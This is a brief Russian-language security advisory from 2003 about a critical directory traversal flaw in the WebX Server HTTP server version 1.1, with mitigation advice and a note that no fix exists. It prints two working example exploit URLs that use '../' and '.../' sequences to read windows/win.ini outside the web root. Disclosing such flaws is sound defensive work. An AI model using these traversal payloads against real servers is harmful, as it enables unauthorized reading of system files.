Доступ к произвольным файлам в WebX Server HTTP сервере
| Дата публикации: | 12.09.2003 |
| Всего просмотров: | 1072 |
| Опасность: | Критическая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
Уязвимые версии: WebX и WebX Lite1.1 Описание: Уязвимость обнаружена в WebX Server HTTP сервере. Удаленный пользователь может просматривать файлы на системе, расположенные вне wwwroot каталога. Пример/Эксплоит: http://[target]/../../../../../. ./../../../../windows/win.ini http://[target]/.../.../.../.../.../.../.../windows/win.ini URL производителя: http://www.futurewavetech.com/products/webx.html Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Фильтруйте последовательность ‘/…/’ на http прокси. Используйте альтернативное программное обеспечение. |
|
| Ссылки: | WebX 1.1 web server Advisory |